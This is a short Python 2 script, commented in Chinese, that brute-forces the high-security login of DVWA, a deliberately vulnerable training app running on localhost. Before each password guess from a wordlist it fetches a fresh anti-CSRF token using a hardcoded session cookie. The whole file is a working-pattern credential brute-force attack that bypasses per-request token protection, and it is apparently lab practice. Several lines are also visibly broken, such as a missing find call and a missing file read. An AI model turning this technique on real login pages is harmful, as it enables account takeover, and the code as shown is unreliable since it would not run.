#coding:utf-8
"""
dvwa高级爆破
需要用户名 密码 token cookie
每次通过账号密码访问之前,需要获取token
"""
import urllib2
from bs4 import BeautifulSoup
def getToken():
"""提取token"""
url="http://localhost/DVWA-master/vulnerabilities/brute/"
req=urllib2.Request(url,headers={"Cookie":"security=high;PHPSESSID=4078b237fc42665f1395fddebcbebc86"})
response=urllib2.urlopen(req)
html=response.read()
soup=BeautifulSoup(html,"")
token=("input",attrs={"name":"user_token"})
return token.get("value")
f=open("zidian","r")
while 1:
line=().strip()
if line==None or len(line)==0:
break
password=line
token=getToken()
url="http://localhost/DVWA-master/vulnerabilities/brute/?username=admin&password=%s&Login=Login&user_token=%s#"%(line,token)
req=urllib2.Request(url,headers={"Cookie":"security=high;PHPSESSID=4078b237fc42665f1395fddebcbebc86"})
response=urllib2.urlopen(req)
html=response.read()
if "Welcome to the password" in html:
print "爆破成功,密码是",password
break